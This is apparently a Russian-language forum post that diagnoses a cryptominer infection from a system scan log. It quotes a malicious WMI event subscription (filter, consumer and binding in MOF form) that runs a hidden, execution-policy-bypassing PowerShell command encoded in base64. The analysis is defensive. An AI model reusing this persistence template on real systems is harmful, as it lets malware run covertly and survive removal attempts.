Похоже, здесь используется запуск закодированного скрипта через WMI-подписку на события: фильтр `FsxxleFilter` опрашивает `Win32_PerfFormattedData_PerfOS_System` с интервалом 720 секунд (`WITHIN 720`), а привязанный к нему через `__FilterToConsumerBinding` consumer `FsxxleConsumer` запускает `powershell -exec bypass -W 1 -E ...` — то есть со скрытым окном и с командой, переданной в кодировке base64 (`-E` = `-EncodedCommand`). Возможно, именно этот скрипт содержит запуск майнера, связанного с процессом msiexec; подтвердить это можно, декодировав содержимое параметра `-E`.
Цитата:
Полное имя C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE Имя файла POWERSHELL.EXE Тек. статус ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске [Запускался неявно или вручную] Сохраненная информация на момент создания образа Статус ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске [Запускался неявно или вручную] File_Id 4A5BC7F377000 Linker 9.0 Размер 473600 байт Создан 14.07.2009 в 03:49:07 Изменен 14.07.2009 в 05:39:20 TimeStamp 13.07.2009 в 23:49:07 EntryPoint + OS Version 0.1 Subsystem Windows character-mode user interface (CUI) subsystem IMAGE_FILE_DLL - IMAGE_FILE_EXECUTABLE_IMAGE + Тип файла 64-х битный ИСПОЛНЯЕМЫЙ Цифр. подпись Действительна, подписано Microsoft Windows Оригинальное имя PowerShell.EXE.MUI Версия файла 6.1.7600.16385 (win7_rtm.090713-1255) Описание Windows PowerShell Производитель Microsoft Corporation Доп. информация на момент обновления списка SHA1 5330FEDAD485E0E4C23B2ABE1075A1F984FDE9FC MD5 852D67A27E454BD389FA7F02A8CBE23F Namespace \\.\root\subscription Consumer_Name FsxxleConsumer Consumer_Class CommandLineEventConsumer Consumer_CommandLineTemplatepowershell -exec bypass -W 1 -E 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 Filter_Name FsxxleFilter Filter_Class __EventFilter Filter_Query SELECT * FROM __InstanceModificationEvent WITHIN 720 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' #MOF_Bind# instance of __FilterToConsumerBinding { Consumer = "CommandLineEventConsumer.Name="FsxxleConsumer""; Filter = "__EventFilter.Name="FsxxleFilter""; };
#MOF_Event# instance of __EventFilter { EventNamespace = "root\\cimv2"; Name = "FsxxleFilter"; Query = "SELECT * FROM __InstanceModificationEvent WITHIN 720 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"; QueryLanguage = "WQL"; };
#MOF_Consumer# instance of CommandLineEventConsumer { CommandLineTemplate = "powershell -exec bypass -W 1 -E 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"; Name = "FsxxleConsumer"; };